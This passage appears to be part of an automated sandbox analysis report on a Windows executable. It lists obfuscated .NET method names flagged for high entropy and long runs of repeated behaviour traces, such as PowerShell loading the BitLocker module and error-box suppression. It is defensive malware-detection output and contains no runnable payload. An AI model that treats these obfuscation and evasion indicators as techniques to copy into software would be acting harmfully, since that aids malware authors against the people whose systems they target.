                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, I7L8C6N1ebf5t9UBNB.csHigh entropy of concatenated method names: 'GhwAnyibkG', 'qKtAsiCy08', 'ToString', 'Q4JAGOYMHa', 'ydLAqEDiSj', 'V73Ab35N3p', 'tiYA8kcdEJ', 'KWeACNh0Vu', 'NZpAK75mWm', 'i0OAIG4CMK'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, qFpaCg4OeA9gyeZYvB.csHigh entropy of concatenated method names: 'cRMAa0XpJN', 'FimAPvP2jr', 'FEnxroRaLi', 'D1YxjmDc24', 'D1IA0jrwGL', 'kggADFGiWg', 'PHEALmoOf0', 'HYFAtRYgdn', 'NOCAhQxFUg', 'NT7Aok0MCh'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, XEbj01c6HjltfqTAYO.csHigh entropy of concatenated method names: 'R6HG07yaTT7p1wrHxiQ', 'jWnbt4yFKwV4f4O8La3', 'Lb4CxmI65B', 'dS1CBVcFBL', 'fCYClqspom', 'k91DwNyYu1JU3W8CJkA', 'enG5bAyRxepn5Q9TkCu'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, a6ErcFYOWqRCf0yytN.csHigh entropy of concatenated method names: 'qd2C1YF2aN', 'CHsCqUSZab', 'YBpC8bDBWf', 'IT6CKBNg4O', 'l0nCIjIysJ', 'WOk8dqRp0M', 'fwx84ULr0r', 'Ryy85rxqRc', 'X8I8aXN9dA', 'eNA8ZJh3yl'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, VTwGxuj9BXOw3aUhmTr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kdVVB6UQ1d', 'xNmVlKFttY', 'f95VgPgmlT', 'yCXVV9C06G', 'f6jV3nqVgZ', 'jKMVHAUR3I', 'FvUVR1pUNb'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Xps7qRzTcm6j2O5EgP.csHigh entropy of concatenated method names: 'fbFlEUaWEi', 'm87lydFlV7', 'dPbl2cJ0k6', 'vMolY90eWD', 'b58lcEeXVy', 'z0FluM8CNn', 'bE3lXil51Y', 'borlRHJdHa', 'gySlf1nh3m', 'r1Vl6mHovj'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, GmQF5c96kjSSXmTedq.csHigh entropy of concatenated method names: 'v0tjKu23Hu', 'g8mjIQLjC7', 'NkhjnIBVLA', 'i5ejsCvd8t', 'fJfjelur6E', 'acFjQOWqRC', 'wjMxeVddQy3O8n4b3E', 'i9JQ60n6NPoaj2Jir7', 'O6bjjELi8v', 'K1OjFPPdsk'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, nrtLcTjjDPGqy3J5J8r.csHigh entropy of concatenated method names: 'zSclPJQaLc', 'LnKlznPo8e', 'y5pgrn35kf', 'stNgjlSHee', 'W59g79iVOf', 'TjVgFqUOmi', 'qqDg9UkcZ1', 'eU9g1kJFbd', 'hFrgG8xD90', 'fmwgqL9dx5'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, VushkvqOit4FjNAy9I.csHigh entropy of concatenated method names: 'Dispose', 'EuIjZeQ4LD', 'FyC7codZQ0', 'hFlOXJLFwU', 'VFyjPGK9yc', 'pqVjzNt61m', 'ProcessDialogKey', 'rMH7r4aIYZ', 'qxA7jL81mU', 'VPf77AelLw'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Xhifmp5Im2uIeQ4LD5.csHigh entropy of concatenated method names: 'VLhBeDH9r4', 'PpyBAd6Ll1', 'LFEBBnyoGc', 'EECBg9iGtG', 'LxtB3R6WMg', 'REgBRqM5SU', 'Dispose', 'UwOxGpbd10', 'rg3xqEOBwh', 'BS8xbboLWy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, ruDEOU2khIBVLAC5eC.csHigh entropy of concatenated method names: 'KZ8bvO40Wr', 'sQEbEXJDhl', 'ffqbyfoUww', 'eKDb2Q4MtS', 'O2FbebY4uW', 'wxdbQHmMpS', 'zOBbAUQdbj', 'BbIbx5nb5X', 'lbMbBl5DUD', 'ot8bllxglN'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, cbbtMY7GD7d1iUYhAX.csHigh entropy of concatenated method names: 'q5GMGslJM', 'EQyvUl5iu', 'CoDE5XOKS', 'b1COhJQJH', 'naI2m2o8C', 'A1hTPLsN0', 'NETVDVLfcWVTSqcl8g', 'nfmL13G8xZw2qfad3n', 'V6TxipDOr', 'oR1lhV4Dv'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, UIgDiRLwSiBdvbIDpp.csHigh entropy of concatenated method names: 'lrPky6NOEY', 'nYvk27DFfA', 'fxnkY9KjQu', 'eYYkcs2k12', 'fEAkuyg4Ey', 'exnkXUy3PT', 'J97kWEtmIx', 'nWtkmoj9mT', 't9mkic3TWQ', 'FVdk0RySk6'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, qelLwRPCPsGUs6jdyY.csHigh entropy of concatenated method names: 'C4JlbnANLt', 'NEvl8YuQcg', 'NN6lCuaIGq', 'MBClKTQfSr', 'heTlBYamwi', 'CwvlISDKoB', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, ggXPZ5pdN41pIJs1V3.csHigh entropy of concatenated method names: 'ilnCo2TpYw', 'jQKCNctpwn', 'g3fCdhQ4Js', 'ToString', 'uj3C4FpJJS', 'SZ2C58A6MS', 'b5LeipymTSahZpCWtVI', 'a1NBaSy4kxFCjHZl6ot', 'qFDxGAyJuBOXAU3uP6S', 'bQbx4HyXSVlTNcxgB9W'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, KiBPZRUmpULxGIDG71.csHigh entropy of concatenated method names: 'vTOKf63TLf', 'Ck4K6KTSyh', 'mpoKMCphDT', 'QUvKvcuiCl', 'sWqKJLKTUR', 'AVkKEThFF6', 'qKhKO19hPd', 'PliKy3LrZg', 'DbjK2KXapj', 'UptKToYVXa'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, vbF4dwbDYXd1pm0UND.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ARs7Zueo2T', 'fg37PlI7bQ', 'L3e7zbBF6O', 'tWGFrMcMJh', 'HfDFjU0QJp', 'OWqF7ccZXX', 'yYaFF3xJ4A', 'KQhgDkf0myA5Z1vVEcy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Ad8t06TsdlZPlGJflu.csHigh entropy of concatenated method names: 'WUa8J9DTew', 'wye8OiWCKY', 'NGlbSsUNHx', 'gWlbuiODZG', 'CyHbXdruHc', 'Gfkbp0H53H', 'NTYbW5uH0F', 'zAhbmigu3E', 'JTvbUr7yE6', 'f39biBHtB9'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, nJfbfko7qhviuIACOm.csHigh entropy of concatenated method names: 'ToString', 'nUvQ0x5mpP', 'yo1QcUWHr2', 'hI2QSgYY72', 'XCdQu7q9R5', 'crEQXSZicJ', 'A2eQpoBqck', 'GK2QW1LDF5', 'dHBQmj1QsF', 'veDQUTGIxR'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Ru23Huyb8mQLjC7BwH.csHigh entropy of concatenated method names: 'qKNqtcoNRU', 'tMRqh655Hk', 'cydqohwEm1', 'lRmqNULURh', 'YdiqdpFKUc', 'YtEq4FoWAb', 'HCMq52QiOf', 'uP5qatB1SB', 'VRjqZoTOF2', 'EtZqPV98Aq'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.csHigh entropy of concatenated method names: 'nNWF1G7MHU', 'yIKFGqwVsM', 'gJUFqwRMVG', 'SoqFbPyRkr', 'dIhF8RGr9t', 'mmlFCbEW2s', 'kfSFK0ejw5', 'xjaFI39hgS', 'iPqFwPHaio', 'nLsFns5SaE'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, UQ2KwGjrcRdMFjeybgG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qqCl0TGnC8', 'QRblDiKoFe', 'YrClL35cag', 'o4xltb0hSF', 'uJ1lhHiIN9', 'JcyloCa4T2', 'lK8lNLhq2E'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, NvlJnjtLs8bdgXBD99.csHigh entropy of concatenated method names: 'CUDeimJgTS', 'qh4eD0ZMSv', 'uAoet9Dgbd', 'KUMehq5Pgl', 'b1GecRRf2P', 'cIAeSuTxAi', 'GdEeuXwLNU', 'qHBeXjJMf9', 'cKcepgQvyC', 'VeDeWRNpAd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, vFBqrTW7LF9gFQ3SS9.csHigh entropy of concatenated method names: 'YusKGfnxTw', 'mFNKbjNWGJ', 'v0kKCBJvHc', 'kTBCPS9JUJ', 'naUCziBAwT', 'AhEKr6FPyy', 'UJ9KjNWpGN', 'uaUK7eDKgu', 'jZxKFcfu0H', 'oiKK9Fo6dd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, w4aIYZZAxAL81mU4Pf.csHigh entropy of concatenated method names: 'tbsBYQAIjb', 'Qj8BcmckrZ', 'ci1BSALIuO', 'vq8BuU9VUD', 'iQWBXj6b9E', 'wigBpJdmud', 'xDwBWsIw0b', 'gveBmn9kue', 'F76BU0DIOI', 'GF1Bi71EUZ'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, I7L8C6N1ebf5t9UBNB.csHigh entropy of concatenated method names: 'GhwAnyibkG', 'qKtAsiCy08', 'ToString', 'Q4JAGOYMHa', 'ydLAqEDiSj', 'V73Ab35N3p', 'tiYA8kcdEJ', 'KWeACNh0Vu', 'NZpAK75mWm', 'i0OAIG4CMK'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, qFpaCg4OeA9gyeZYvB.csHigh entropy of concatenated method names: 'cRMAa0XpJN', 'FimAPvP2jr', 'FEnxroRaLi', 'D1YxjmDc24', 'D1IA0jrwGL', 'kggADFGiWg', 'PHEALmoOf0', 'HYFAtRYgdn', 'NOCAhQxFUg', 'NT7Aok0MCh'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, XEbj01c6HjltfqTAYO.csHigh entropy of concatenated method names: 'R6HG07yaTT7p1wrHxiQ', 'jWnbt4yFKwV4f4O8La3', 'Lb4CxmI65B', 'dS1CBVcFBL', 'fCYClqspom', 'k91DwNyYu1JU3W8CJkA', 'enG5bAyRxepn5Q9TkCu'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, a6ErcFYOWqRCf0yytN.csHigh entropy of concatenated method names: 'qd2C1YF2aN', 'CHsCqUSZab', 'YBpC8bDBWf', 'IT6CKBNg4O', 'l0nCIjIysJ', 'WOk8dqRp0M', 'fwx84ULr0r', 'Ryy85rxqRc', 'X8I8aXN9dA', 'eNA8ZJh3yl'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, VTwGxuj9BXOw3aUhmTr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kdVVB6UQ1d', 'xNmVlKFttY', 'f95VgPgmlT', 'yCXVV9C06G', 'f6jV3nqVgZ', 'jKMVHAUR3I', 'FvUVR1pUNb'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Xps7qRzTcm6j2O5EgP.csHigh entropy of concatenated method names: 'fbFlEUaWEi', 'm87lydFlV7', 'dPbl2cJ0k6', 'vMolY90eWD', 'b58lcEeXVy', 'z0FluM8CNn', 'bE3lXil51Y', 'borlRHJdHa', 'gySlf1nh3m', 'r1Vl6mHovj'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, GmQF5c96kjSSXmTedq.csHigh entropy of concatenated method names: 'v0tjKu23Hu', 'g8mjIQLjC7', 'NkhjnIBVLA', 'i5ejsCvd8t', 'fJfjelur6E', 'acFjQOWqRC', 'wjMxeVddQy3O8n4b3E', 'i9JQ60n6NPoaj2Jir7', 'O6bjjELi8v', 'K1OjFPPdsk'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, nrtLcTjjDPGqy3J5J8r.csHigh entropy of concatenated method names: 'zSclPJQaLc', 'LnKlznPo8e', 'y5pgrn35kf', 'stNgjlSHee', 'W59g79iVOf', 'TjVgFqUOmi', 'qqDg9UkcZ1', 'eU9g1kJFbd', 'hFrgG8xD90', 'fmwgqL9dx5'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, VushkvqOit4FjNAy9I.csHigh entropy of concatenated method names: 'Dispose', 'EuIjZeQ4LD', 'FyC7codZQ0', 'hFlOXJLFwU', 'VFyjPGK9yc', 'pqVjzNt61m', 'ProcessDialogKey', 'rMH7r4aIYZ', 'qxA7jL81mU', 'VPf77AelLw'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, Xhifmp5Im2uIeQ4LD5.csHigh entropy of concatenated method names: 'VLhBeDH9r4', 'PpyBAd6Ll1', 'LFEBBnyoGc', 'EECBg9iGtG', 'LxtB3R6WMg', 'REgBRqM5SU', 'Dispose', 'UwOxGpbd10', 'rg3xqEOBwh', 'BS8xbboLWy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, ruDEOU2khIBVLAC5eC.csHigh entropy of concatenated method names: 'KZ8bvO40Wr', 'sQEbEXJDhl', 'ffqbyfoUww', 'eKDb2Q4MtS', 'O2FbebY4uW', 'wxdbQHmMpS', 'zOBbAUQdbj', 'BbIbx5nb5X', 'lbMbBl5DUD', 'ot8bllxglN'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, cbbtMY7GD7d1iUYhAX.csHigh entropy of concatenated method names: 'q5GMGslJM', 'EQyvUl5iu', 'CoDE5XOKS', 'b1COhJQJH', 'naI2m2o8C', 'A1hTPLsN0', 'NETVDVLfcWVTSqcl8g', 'nfmL13G8xZw2qfad3n', 'V6TxipDOr', 'oR1lhV4Dv'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, UIgDiRLwSiBdvbIDpp.csHigh entropy of concatenated method names: 'lrPky6NOEY', 'nYvk27DFfA', 'fxnkY9KjQu', 'eYYkcs2k12', 'fEAkuyg4Ey', 'exnkXUy3PT', 'J97kWEtmIx', 'nWtkmoj9mT', 't9mkic3TWQ', 'FVdk0RySk6'

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
